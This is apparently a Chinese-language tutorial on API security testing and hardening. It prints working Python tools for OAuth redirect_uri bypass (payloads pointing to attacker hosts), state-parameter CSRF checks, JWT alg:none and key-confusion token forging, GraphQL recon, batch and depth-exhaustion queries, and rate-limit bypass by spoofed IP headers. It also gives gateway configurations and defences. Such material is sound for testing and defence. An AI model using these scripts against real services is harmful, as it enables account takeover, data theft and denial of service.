执行摘要 #
现代 Web 应用的核心是 API——RESTful、GraphQL、gRPC,它们承载着数据流转和业务逻辑。然而,API 同时也是攻击面最广、漏洞最密集的入口点。OWASP API Security Top 10(2023)中,BOLA(破损的对象级授权)连续位居榜首。本文将深入剖析 OAuth2/OIDC 的认证绕过、GraphQL 注入攻击、Rate Limiting 绕过,以及 API 网关安全加固的完整技术实践。
OAuth 2.0 与 OIDC 深度解析 #
OAuth 2.0 授权码流程 #
标准 OAuth 2.0 授权码流程(RFC 6749)包含以下步骤:
客户端 授权服务器 资源服务器
│ │ │
│ (1) Authorization Request │ │
│◄───────────────────────────┤ │
│ redirect_uri + client_id │ │
│ │ │
│ (2) User Authentication │ │
│◄───────────────────────────┤ │
│ login + consent │ │
│ │ │
│ (3) Authorization Code │ │
│───────────────────────────►│ │
│ code=abc123&state=xyz │ │
│ │ │
│ (4) Token Request │ │
│───────────────────────────►│ │
│ code + client_secret │ │
│ │ │
│ (5) Access + Refresh Token│ │
│◄───────────────────────────┤ │
│ │ │
│ (6) API Request │ │
│──────────────────────────────────────────────────────►│
│ Authorization: Bearer <token> │
│ │ │
│ (7) Resource Response │ │
│◄──────────────────────────────────────────────────────│PKCE(Proof Key for Code Exchange) #
PKCE(RFC 7636)解决了公共客户端(移动端、SPA)在授权码交换过程中可能被截获的问题:
client authorization server
│ │
│ code_verifier = random(43-128) │
│ code_challenge = BASE64URL(SHA256(code_verifier))
│ │
│ Auth Request + code_challenge │
│ &code_challenge_method=S256 │
│◄────────────────────────────────┤
│ │
│ Authorization Code │
│────────────────────────────────►│
│ │
│ Token Request │
│ + code_verifier │
│────────────────────────────────►│
│ │
│ server verifies: │
│ SHA256(code_verifier) == │
│ stored code_challenge │
│ │
│ Access Token │
│◄────────────────────────────────┤实现 PKCE 的 Go 客户端:
package oauth
import (
"crypto/rand"
"crypto/sha256"
"encoding/base64"
"fmt"
"net/http"
"net/url"
)
// PKCE generates code_verifier and code_challenge for OAuth 2.0 PKCE
type PKCE struct {
CodeVerifier string
CodeChallenge string
}
// GeneratePKCE creates a new PKCE challenge pair
func GeneratePKCE() (*PKCE, error) {
verifierBytes := make([]byte, 32)
if _, err := rand.Read(verifierBytes); err != nil {
return nil, fmt.Errorf("failed to generate random bytes: %w", err)
}
verifier := base64.RawURLEncoding.EncodeToString(verifierBytes)
hash := sha256.Sum256([]byte(verifier))
challenge := base64.RawURLEncoding.EncodeToString(hash[:])
return &PKCE{
CodeVerifier: verifier,
CodeChallenge: challenge,
}, nil
}
// BuildAuthorizationURL constructs the OAuth authorization URL with PKCE
func BuildAuthorizationURL(baseURL, clientID, redirectURI, state string, pkce *PKCE) string {
params := url.Values{}
params.Set("response_type", "code")
params.Set("client_id", clientID)
params.Set("redirect_uri", redirectURI)
params.Set("state", state)
params.Set("code_challenge", pkce.CodeChallenge)
params.Set("code_challenge_method", "S256")
params.Set("scope", "openid profile email")
return fmt.Sprintf("%s/authorize?%s", baseURL, params.Encode())
}
// BuildTokenRequest constructs the token exchange request with PKCE verifier
func BuildTokenRequest(baseURL, clientID, code, redirectURI, codeVerifier string) *http.Request {
data := url.Values{}
data.Set("grant_type", "authorization_code")
data.Set("client_id", clientID)
data.Set("code", code)
data.Set("redirect_uri", redirectURI)
data.Set("code_verifier", codeVerifier)
req, _ := http.NewRequest("POST", baseURL+"/token",
strings.NewReader(data.Encode()))
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
return req
}OAuth 2.0 漏洞与绕过技术 #
1. Redirect URI 操作 #
Redirect URI 操纵是最常见的 OAuth 漏洞之一。当授权服务器未对 redirect_uri 进行精确匹配时,攻击者可以截获授权码:
# redirect_uri bypass techniques
BYPASS_PATTERNS = [
# 子域名匹配绕过 (example.com 匹配 evil.example.com)
"https://evil.attacker.com?redirect=https://legitimate-app.com/callback",
# 开放重定向链接
"https://legitimate-app.com/redirect?url=https://evil.attacker.com",
# 双 URL 编码
"https://legitimate%252ecom.attacker.com",
# URI 前缀匹配绕过
"https://legitimate-app.com.evil.com/callback",
# 大小写绕过 (某些实现不区分大小写)
"https://LEGITIMATE-app.com/callback",
# 路径注入
"https://legitimate-app.com/callback#https://evil.attacker.com",
# @ 符号技巧
"https://legitimate-app.com@evil.attacker.com",
]
def test_redirect_uri_vulnerability(base_url, client_id):
"""Test various redirect URI bypass techniques."""
results = []
for uri in BYPASS_PATTERNS:
auth_url = (
f"{base_url}/authorize?"
f"response_type=code"
f"&client_id={client_id}"
f"&redirect_uri={urllib.parse.quote_plus(uri)}"
f"&state=test123"
)
resp = requests.get(auth_url, allow_redirects=False)
if resp.status_code == 302:
location = resp.headers.get("Location", "")
if "error" not in location.lower():
results.append({
"pattern": uri,
"status": resp.status_code,
"location": location,
"vulnerable": True
})
return results2. Token 泄露 #
Token 泄露的常见场景:
- URL 参数中的 access_token:将 token 放在 URL 中会导致其出现在浏览器历史、代理日志和 Referer 头中
- implicit grant 类型:token 通过 URL fragment 返回,可被 XSS 或浏览器扩展截获
- Token 在日志中记录:很多应用在日志中打印完整的请求头
# 检测 token 泄露——搜索日志文件中的 token 模式
$ grep -rE 'access_token=["\']?[A-Za-z0-9._-]{20,}' /var/log/nginx/ --include="*.log"
$ grep -rE 'Bearer\s+[A-Za-z0-9._-]{20,}' /var/log/app/ --include="*.log"
# 在代码仓库中搜索硬编码的 token
$ trufflehog filesystem --no-update --fail /path/to/repo3. State 参数绕过 #
如果应用未验证 state 参数,攻击者可以发起 CSRF 攻击:
#!/usr/bin/env python3
"""
oauth_csrf_tester.py - Test OAuth state parameter validation
"""
import requests
import urllib.parse
from typing import Dict, Optional
class OAuthCSRFSampler:
"""Test for OAuth CSRF vulnerabilities."""
def __init__(self, auth_server: str, client_id: str, redirect_uri: str):
self.auth_server = auth_server
self.client_id = client_id
self.redirect_uri = redirect_uri
def test_missing_state(self) -> Dict:
"""Test if authorization works without state parameter."""
params = {
"response_type": "code",
"client_id": self.client_id,
"redirect_uri": self.redirect_uri,
# state intentionally omitted
}
url = f"{self.auth_server}/authorize?{urllib.parse.urlencode(params)}"
resp = requests.get(url, allow_redirects=False)
return {
"test": "missing_state",
"status_code": resp.status_code,
"redirects_to_callback": resp.status_code == 302 and
self.redirect_uri in resp.headers.get("Location", ""),
"vulnerable": resp.status_code == 302,
}
def test_empty_state(self) -> Dict:
"""Test if empty state is accepted."""
params = {
"response_type": "code",
"client_id": self.client_id,
"redirect_uri": self.redirect_uri,
"state": "",
}
url = f"{self.auth_server}/authorize?{urllib.parse.urlencode(params)}"
resp = requests.get(url, allow_redirects=False)
return {
"test": "empty_state",
"status_code": resp.status_code,
"redirects_to_callback": resp.status_code == 302 and
self.redirect_uri in resp.headers.get("Location", ""),
"vulnerable": resp.status_code == 302,
}
def test_state_prediction(self, code: str) -> Dict:
"""Test if state value can be predicted or reused."""
# Try common state patterns
states_to_try = ["", "1", "test", code[:10], code[-10:]]
for state_val in states_to_try:
params = {
"response_type": "code",
"client_id": self.client_id,
"redirect_uri": self.redirect_uri,
"state": state_val,
}
url = f"{self.auth_server}/authorize?{urllib.parse.urlencode(params)}"
resp = requests.get(url, allow_redirects=False)
if resp.status_code == 302:
return {
"test": "state_prediction",
"tried_state": state_val,
"vulnerable": True,
"redirect": resp.headers.get("Location"),
}
return {"test": "state_prediction", "vulnerable": False}
def run_all_tests(self) -> Dict:
"""Run all CSRF-related OAuth tests."""
results = {
"target": self.auth_server,
"tests": [
self.test_missing_state(),
self.test_empty_state(),
],
}
return results4. JWT 漏洞利用 #
OIDC 使用 JWT 作为 ID Token,其常见漏洞包括:
#!/usr/bin/env python3
"""
jwt_security_tester.py - Test JWT vulnerabilities in OIDC implementations
"""
import json
import base64
import hmac
import hashlib
from typing import Optional, Dict
class JWTTester:
"""Test common JWT security vulnerabilities."""
@staticmethod
def decode_jwt_unverified(token: str) -> Dict:
"""Decode JWT without verification (for analysis)."""
parts = token.split(".")
if len(parts) != 3:
raise ValueError("Invalid JWT format")
def decode_segment(seg):
# Add padding
padding = 4 - len(seg) % 4
if padding != 4:
seg += "=" * padding
return json.loads(base64.urlsafe_b64decode(seg))
return {
"header": decode_segment(parts[0]),
"payload": decode_segment(parts[1]),
"signature": parts[2],
}
def test_alg_none(self, token: str) -> bool:
"""Test if 'alg: none' is accepted."""
decoded = self.decode_jwt_unverified(token)
header = decoded["header"]
if header.get("alg") == "none":
print("[!] JWT header uses 'alg: none' - signature is not verified")
return True
# Attempt alg:none attack
header["alg"] = "none"
new_header = base64.urlsafe_b64encode(
json.dumps(header).encode()
).rstrip(b"=").decode()
payload = token.split(".")[1]
forged_token = f"{new_header}.{payload}."
print(f"[*] Forged 'alg:none' token: {forged_token[:50]}...")
return False # Need to test against the actual server
def test_key_confusion(self, token: str, public_key: bytes) -> Optional[str]:
"""Test RS256/HS256 key confusion attack."""
decoded = self.decode_jwt_unverified(token)
if decoded["header"].get("alg") != "RS256":
return None
# Try to sign with the public key using HMAC
header = decoded["header"]
header["alg"] = "HS256"
new_header = base64.urlsafe_b64encode(
json.dumps(header).encode()
).rstrip(b"=").decode()
payload = token.split(".")[1]
signing_input = f"{new_header}.{payload}"
forged_sig = base64.urlsafe_b64encode(
hmac.new(public_key, signing_input.encode(), hashlib.sha256).digest()
).rstrip(b"=").decode()
forged_token = f"{signing_input}.{forged_sig}"
return forged_token
def test_jwk_header_injection(self, token: str) -> bool:
"""Test JWK header injection (CVE-2018-0114 / CVE-2018-1000583)."""
decoded = self.decode_jwt_unverified(token)
header = decoded["header"]
# Check if jwk or jku is in the header
if "jwk" in header or "jku" in header:
print(f"[!] JWT uses {'jwk' if 'jwk' in header else 'jku'} header")
print(f" Header: {json.dumps(header, indent=2)}")
return True
return False
def analyze_token(self, token: str) -> Dict:
"""Full JWT analysis."""
decoded = self.decode_jwt_unverified(token)
analysis = {
"algorithm": decoded["header"].get("alg", "unknown"),
"type": decoded["header"].get("typ", "unknown"),
"issuer": decoded["payload"].get("iss"),
"audience": decoded["payload"].get("aud"),
"subject": decoded["payload"].get("sub"),
"expires_at": decoded["payload"].get("exp"),
"issued_at": decoded["payload"].get("iat"),
"has_jwk": "jwk" in decoded["header"],
"has_jku": "jku" in decoded["header"],
"has_x5u": "x5u" in decoded["header"],
"custom_claims": [
k for k in decoded["payload"].keys()
if k not in ["iss", "sub", "aud", "exp", "iat", "nbf", "jti",
"email", "email_verified", "name", "picture"]
],
}
return analysisGraphQL 安全深度分析 #
内省查询滥用 #
GraphQL 的内省机制允许客户端查询 schema 信息,这在开发环境中非常有用,但在生产环境中会成为信息泄露的源头:
# 标准内省查询 - 获取完整的 schema 信息
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
types {
...FullType
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}内省查询的 Python 自动化脚本:
#!/usr/bin/env python3
"""
graphql_recon.py - GraphQL introspection and reconnaissance tool
"""
import json
import requests
from typing import Dict, List, Optional, Tuple
class GraphQLRecon:
"""GraphQL endpoint reconnaissance and vulnerability discovery."""
INTROSPECTION_QUERY = """
query {
__schema {
queryType { name }
mutationType { name }
types {
kind
name
fields { name type { name kind ofType { name } } }
inputFields { name type { name kind ofType { name } } }
enumValues { name }
}
directives { name locations args { name type { name } } }
}
}
"""
def __init__(self, endpoint: str, headers: Optional[Dict] = None):
self.endpoint = endpoint
self.headers = headers or {
"Content-Type": "application/json",
"Accept": "application/json",
}
self.schema_info = {}
def check_introspection(self) -> bool:
"""Check if introspection is enabled."""
try:
resp = requests.post(
self.endpoint,
json={"query": self.INTROSPECTION_QUERY},
headers=self.headers,
timeout=10,
)
if resp.status_code == 200:
data = resp.json()
if "__schema" in data.get("data", {}):
self.schema_info = data["data"]["__schema"]
return True
if "errors" in data:
for err in data["errors"]:
if "introspection" in err.get("message", "").lower():
return False
return False
except requests.RequestException as e:
print(f"[-] Request failed: {e}")
return False
def enumerate_types(self) -> List[Dict]:
"""Enumerate all types from the schema."""
if not self.schema_info:
return []
types = []
for t in self.schema_info.get("types", []):
if t["name"].startswith("__"):
continue # Skip internal types
types.append({
"name": t["name"],
"kind": t["kind"],
"fields": [f["name"] for f in (t.get("fields") or [])],
"input_fields": [f["name"] for f in (t.get("inputFields") or [])],
"enum_values": [e["name"] for e in (t.get("enumValues") or [])],
})
return types
def enumerate_queries(self) -> List[Dict]:
"""List all available queries."""
if not self.schema_info:
return []
query_type_name = self.schema_info.get("queryType", {}).get("name", "Query")
for t in self.schema_info.get("types", []):
if t["name"] == query_type_name:
return [
{
"name": f["name"],
"args": [
{
"name": a["name"],
"type": a["type"].get("name") or
a["type"].get("ofType", {}).get("name"),
}
for a in (f.get("args") or [])
],
}
for f in (t.get("fields") or [])
]
return []
def enumerate_mutations(self) -> List[Dict]:
"""List all available mutations."""
if not self.schema_info:
return []
mutation_type = self.schema_info.get("mutationType")
if not mutation_type:
return []
mutation_type_name = mutation_type.get("name", "Mutation")
for t in self.schema_info.get("types", []):
if t["name"] == mutation_type_name:
return [
{
"name": f["name"],
"args": [
{
"name": a["name"],
"type": a["type"].get("name") or
a["type"].get("ofType", {}).get("name"),
}
for a in (f.get("args") or [])
],
}
for f in (t.get("fields") or [])
]
return []
def test_batch_query(self, query: str, variables: Optional[Dict] = None, batch_size: int = 10) -> Dict:
"""Test GraphQL batch query processing."""
batch = [{"query": query, "variables": variables} for _ in range(batch_size)]
resp = requests.post(
self.endpoint,
json=batch,
headers=self.headers,
timeout=15,
)
return {
"status_code": resp.status_code,
"batch_supported": resp.status_code == 200 and isinstance(resp.json(), list),
"response_count": len(resp.json()) if isinstance(resp.json(), list) else 1,
"response": resp.text[:500],
}
def test_depth_exhaustion(self, max_depth: int = 20) -> Dict:
"""Test for GraphQL depth exhaustion (DoS)."""
# Build a deeply nested query
def build_nested_query(type_name: str, depth: int) -> str:
if depth <= 0:
return "id"
return f"""
{type_name} {{
id
children {{
{build_nested_query(type_name, depth - 1)}
}}
}}
"""
results = {}
for depth in [5, 10, 15, max_depth]:
query = f"query {{ {build_nested_query('Node', depth)} }}"
import time
start = time.time()
try:
resp = requests.post(
self.endpoint,
json={"query": query},
headers=self.headers,
timeout=30,
)
elapsed = time.time() - start
results[depth] = {
"status": resp.status_code,
"elapsed_seconds": round(elapsed, 3),
"error": "timeout" if elapsed >= 30 else None,
}
except requests.Timeout:
results[depth] = {
"status": "timeout",
"elapsed_seconds": 30,
"error": "timeout",
}
return results
def run_recon(self) -> Dict:
"""Run full reconnaissance."""
print(f"[*] Checking introspection at {self.endpoint}...")
introspection_enabled = self.check_introspection()
if not introspection_enabled:
print("[-] Introspection is disabled")
return {"introspection": False}
print(f"[+] Introspection enabled. Enumerating schema...")
return {
"introspection": True,
"queries": self.enumerate_queries(),
"mutations": self.enumerate_mutations(),
"types": self.enumerate_types(),
}
if __name__ == "__main__":
import sys
endpoint = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:4000/graphql"
recon = GraphQLRecon(endpoint)
results = recon.run_recon()
if results.get("introspection"):
print(f"\n[+] Found {len(results['queries'])} queries")
print(f"[+] Found {len(results['mutations'])} mutations")
print(f"[+] Found {len(results['types'])} types")
for q in results["queries"]:
print(f" Query: {q['name']}")
for m in results["mutations"]:
print(f" Mutation: {m['name']}")批量查询攻击 #
GraphQL 支持在单个请求中发送多个操作。如果未做限制,攻击者可以:
- 绕过 rate limiting:一次请求执行多个操作
- 暴力破解:批量执行登录查询
- 数据批量泄露:一次性获取大量数据
# 批量注入攻击示例
BATCH_ATTACKS = [
# 批量查询 - 绕过 rate limit
{
"query": """
query {
user1: user(id: "1") { email password_hash }
user2: user(id: "2") { email password_hash }
user3: user(id: "3") { email password_hash }
user4: user(id: "4") { email password_hash }
user5: user(id: "5") { email password_hash }
}
"""
},
# 别名混淆 - 绕过字段级权限
{
"query": """
query {
a: user(id: "1") { email }
b: user(id: "1") { ssn }
c: user(id: "1") { creditCard }
}
"""
},
]深度耗尽攻击 #
GraphQL 的嵌套查询可以构造出指数级复杂度的查询,导致 DoS:
# 深度耗尽攻击 - 构造深层嵌套查询
query DeepRecursion {
departments {
employees {
manager {
department {
employees {
manager {
department {
# ... can be nested arbitrarily deep
employees {
salary
ssn
}
}
}
}
}
}
}
}
}Rate Limiting 绕过技术 #
IP 欺骗头 #
#!/usr/bin/env python3
"""
rate_limit_bypass.py - Test rate limiting bypass techniques
"""
import requests
import time
from itertools import product
from typing import Dict, List
class RateLimitBypassTester:
"""Test various rate limiting bypass techniques."""
# Common IP forwarding headers that some gateways trust
IP_HEADERS = [
"X-Forwarded-For",
"X-Real-IP",
"X-Client-IP",
"X-Forwarded",
"Forwarded",
"X-Cluster-Client-IP",
"X-Original-Remote-Addr",
"CF-Connecting-IP", # Cloudflare
"True-Client-IP", # Akamai
"Fastly-Client-Ip", # Fastly
"WL-Proxy-Client-IP", # WebLogic
]
# Common bypass IP values
BYPASS_IPS = [
"127.0.0.1",
"localhost",
"10.0.0.1",
"192.168.1.1",
"172.16.0.1",
"0.0.0.0",
"::1",
# Multi-IP chain (some gateways use first IP)
"127.0.0.1, 8.8.8.8",
"10.0.0.1, 8.8.8.8",
]
def __init__(self, target_url: str, method: str = "POST",
payload: Dict = None, headers: Dict = None):
self.target_url = target_url
self.method = method.upper()
self.payload = payload or {}
self.default_headers = headers or {"Content-Type": "application/json"}
def test_ip_header_spoofing(self, num_requests: int = 5) -> List[Dict]:
"""Test if spoofing IP headers bypasses rate limiting."""
results = []
for header in self.IP_HEADERS:
for ip in self.BYPASS_IPS:
test_headers = self.default_headers.copy()
test_headers[header] = ip
try:
if self.method == "POST":
resp = requests.post(
self.target_url,
json=self.payload,
headers=test_headers,
timeout=10,
)
else:
resp = requests.get(
self.target_url,
headers=test_headers,
timeout=10,
)
is_rate_limited = resp.status_code in (429, 503)
results.append({
"header": header,
"ip": ip,
"status": resp.status_code,
"rate_limited": is_rate_limited,
"rate_limit_remaining": resp.headers.get("X-RateLimit-Remaining"),
"rate_limit_reset": resp.headers.get("X-RateLimit-Reset"),
"retry_after": resp.headers.get("Retry-After"),
"bypass_successful": not is_rate_limited,
})
except requests.RequestException as e:
results.append({
"header": header,
"ip": ip,
"error": str(e),
})
return results
def test_parameter_pollution(self, num_requests: int = 5) -> List[Dict]:
"""Test HTTP parameter pollution for rate limit bypass."""
results = []
# Test with duplicate parameters
pollution_variants = [
{"api_key": ["key1", "key2"]},
{"user_id": ["1", "2", "3"]},
{"token": ["a" * 32, "b" * 32]},
]
for variant in pollution_variants:
payload = self.payload.copy()
payload.update(variant)
resp = requests.post(
self.target_url,
json=payload,
headers=self.default_headers,
timeout=10,
)
results.append({
"variant": str(variant),
"status": resp.status_code,
"rate_limited": resp.status_code in (429, 503),
})
return results
def test_timing_based_bypass(self, interval: float = 0.5,
num_requests: int = 20) -> List[Dict]:
"""Test if slow-and-steady requests bypass rate limits."""
results = []
for i in range(num_requests):
start = time.time()
resp = requests.post(
self.target_url,
json=self.payload,
headers=self.default_headers,
timeout=10,
)
elapsed = time.time() - start
results.append({
"request_number": i + 1,
"interval": interval,
"status": resp.status_code,
"elapsed": round(elapsed, 3),
"rate_limited": resp.status_code in (429, 503),
})
time.sleep(interval)
return results
def run_full_test(self) -> Dict:
"""Run all rate limiting bypass tests."""
print(f"[*] Testing rate limit bypass against {self.target_url}")
print(f"[*] Phase 1: IP header spoofing...")
ip_results = self.test_ip_header_spoofing()
successful_bypasses = [r for r in ip_results if r.get("bypass_successful")]
print(f" Found {len(successful_bypasses)} potential bypasses")
print(f"[*] Phase 2: Parameter pollution...")
pollution_results = self.test_parameter_pollution()
print(f"[*] Phase 3: Timing-based bypass...")
timing_results = self.test_timing_based_bypass()
return {
"ip_spoofing": ip_results,
"parameter_pollution": pollution_results,
"timing": timing_results,
}API 网关安全加固 #
Kong 网关安全配置 #
# kong.yaml - Secure Kong gateway configuration
_format_version: "3.0"
services:
- name: api-backend
url: http://backend:8080
routes:
- name: api-route
paths:
- /api/
strip_path: false
plugins:
# Rate limiting
- name: rate-limiting
config:
second: 100
minute: 5000
hour: 100000
policy: redis
redis:
host: redis-rate-limit
port: 6379
# Request size limit
- name: request-size-limiting
config:
allowed_payload_sizes:
- 1048576 # 1MB
# CORS
- name: cors
config:
origins:
- "https://app.techorigin.dev"
methods:
- GET
- POST
headers:
- Authorization
- Content-Type
max_age: 3600
# JWT validation
- name: jwt
config:
claims_to_verify:
- exp
# Bot detection
- name: bot-detection
config:
allow_bots: false
restricted_agents:
- "sqlmap"
- "nikto"
- "nmap"
# IP restriction
- name: ip-restriction
config:
allow:
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
# OAuth2 authentication
- name: oauth2
config:
scopes:
- read
- write
- admin
mandatory_scope: true
token_expiration: 3600
enable_client_credentials: true
hide_token_hash: trueAPISIX 安全配置 #
# APISIX security configuration
routes:
- uri: /api/*
plugins:
jwt-auth:
secret: "${JWT_SECRET}"
algorithm: HS256
limit-req:
rate: 100
burst: 200
key: remote_addr
rejected_code: 429
cors:
allow_origins: "https://app.techorigin.dev"
allow_methods: "GET,POST,PUT,DELETE"
allow_headers: "Authorization,Content-Type,X-Request-ID"
request-id:
prefix: "req-"
fault-injection: # Only in testing
abort:
http_status: 500
body: '{"error":"test"}'
response-rewrite:
headers:
X-Frame-Options: "DENY"
X-Content-Type-Options: "nosniff"
Strict-Transport-Security: "max-age=31536000; includeSubDomains"Envoy 安全过滤器链 #
# envoy.yaml - Secure Envoy proxy configuration
static_resources:
listeners:
- name: api_listener
address:
socket_address:
address: 0.0.0.0
port_value: 8443
filter_chains:
- filters:
- name: envoy.filters.network.http_connection_manager
typed_config:
"@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
stat_prefix: ingress_https
codec_type: AUTO
route_config:
name: local_route
virtual_hosts:
- name: api
domains: ["api.techorigin.dev"]
routes:
- match:
prefix: "/api/"
route:
cluster: api_backend
timeout: 30s
retry_policy:
retry_on: "5xx"
num_retries: 3
response_headers_to_add:
- header:
key: "X-Frame-Options"
value: "DENY"
- header:
key: "X-Content-Type-Options"
value: "nosniff"
- header:
key: "Strict-Transport-Security"
value: "max-age=31536000; includeSubDomains"
- header:
key: "X-XSS-Protection"
value: "1; mode=block"
http_filters:
# External authorization (JWT validation)
- name: envoy.ext_authz
typed_config:
"@type": type.googleapis.com/envoy.extensions.filters.http.ext_authz.v3.ExtAuthz
transport_api_version: V3
failure_mode_allow: false
with_request_body:
allow_partial: true
max_request_bytes: 8192
# Rate limiting
- name: envoy.rate_limit
typed_config:
"@type": type.googleapis.com/envoy.extensions.filters.http.ratelimit.v3.RateLimit
domain: api_ratelimit
timeout: 10ms
# RBAC
- name: envoy.filters.http.rbac
typed_config:
"@type": type.googleapis.com/envoy.extensions.filters.http.rbac.v3.RBAC
rules:
policies:
"api-access":
permissions:
- header:
name: ":path"
string_match:
prefix: "/api/"
principals:
- authenticated:
principal_name:
prefix: "spiffe://"
# Router
- name: envoy.filters.http.router
typed_config:
"@type": type.googleapis.com/envoy.extensions.filters.http.router.v3.RouterBurp Suite 自动化扫描 #
Burp 扩展脚本 #
"""
api_security_scanner.py - Burp Suite extension for automated API security testing
Implements custom scanner checks for OAuth2 and GraphQL vulnerabilities
"""
from burp import IScannerCheck
from burp import IScanIssue
import json
class APISecurityScanner(IScannerCheck):
"""Custom Burp scanner check for API security issues."""
def doPassiveScan(self, baseRequestResponse):
issues = []
url = self._helpers.analyzeRequest(baseRequestResponse).getUrl()
content_type = self._get_header(
baseRequestResponse, "Content-Type"
)
# Check 1: Missing security headers
response_headers = self._helpers.analyzeResponse(baseRequestResponse.getResponse())
required_headers = {
"Strict-Transport-Security": "Missing HSTS header",
"X-Content-Type-Options": "Missing X-Content-Type-Options",
"X-Frame-Options": "Missing X-Frame-Options",
}
for header, desc in required_headers.items():
if not any(header.lower() in h.lower()
for h in response_headers.getHeaders()):
issues.append(
CustomScanIssue(
url,
header,
desc,
"Information",
"Certain"
)
)
# Check 2: OAuth token in URL
request = self._helpers.bytesToString(baseRequestResponse.getRequest())
if "access_token=" in url.lower():
issues.append(
CustomScanIssue(
url,
"access_token_in_url",
"OAuth access token exposed in URL parameters",
"High",
"Firm"
)
)
# Check 3: Verbose error messages in API responses
response_body = self._helpers.bytesToString(
baseRequestResponse.getResponse()[response_headers.getBodyOffset():]
)
error_patterns = [
"stack trace",
"Traceback (most recent call last)",
"at org.springframework",
"at com.mongodb",
"SQLSTATE",
"java.lang.NullPointerException",
"Internal Server Error",
"PDOException",
]
for pattern in error_patterns:
if pattern.lower() in response_body.lower():
issues.append(
CustomScanIssue(
url,
"verbose_error",
f"Verbose error message detected: '{pattern}'",
"Medium",
"Tentative"
)
)
break
return issues if issues else None
def _get_header(self, request_response, header_name):
headers = self._helpers.analyzeRequest(request_response).getHeaders()
for h in headers:
if h.lower().startswith(header_name.lower() + ":"):
return h.split(": ", 1)[1] if ": " in h else ""
return None
def consolidateDuplicateIssues(self, existing, newIssue):
if existing.getUrl() == newIssue.getUrl() and \
existing.getIssueName() == newIssue.getIssueName():
return existing
return None
class CustomScanIssue(IScanIssue):
"""Custom scan issue implementation."""
def __init__(self, url, issue_name, detail, severity, confidence):
self._url = url
self._name = issue_name
self._detail = detail
self._severity = severity
self._confidence = confidence
def getUrl(self):
return self._url
def getIssueName(self):
return self._name
def getIssueType(self):
return 0x02000000 # Custom type
def getSeverity(self):
return self._severity
def getConfidence(self):
return self._confidence
def getIssueDetail(self):
return self._detail
def getRemediationDetail(self):
return f"Fix the {self._name} issue in the API response."
def getHttpMessages(self):
return None
def getHttpService(self):
return None防御建议总结 #
| 威胁类型 | 防御措施 | 验证方法 |
|---|---|---|
| OAuth redirect 劫持 | 精确匹配 redirect_uri + PKCE | 测试各种 redirect 变体 |
| Token 泄露 | 不在 URL 中传 token;短期 TTL | 扫描日志和代码库 |
| State 参数 CSRF | 强制 state 验证 + 绑定 session | 省略/修改 state 重放 |
| JWT 算法攻击 | 固定 alg 验证 + 密钥隔离 | alg:none 注入测试 |
| GraphQL 内省泄露 | 生产环境禁用内省 | 发送内省查询 |
| GraphQL DoS | 查询深度/复杂度限制 | 深度递归查询测试 |
| Rate limit 绕过 | 多维度限流(IP + User + API Key) | 测试各种 IP 头 |
| API 信息泄露 | 最小化响应字段 + 统一错误格式 | 分析错误响应 |
API 安全的核心原则是:永远不要信任客户端输入、最小化暴露的信息、实施零信任架构。通过自动化工具进行持续测试,结合人工审计覆盖工具无法检测的逻辑漏洞,才能构建真正健壮的 API 安全体系。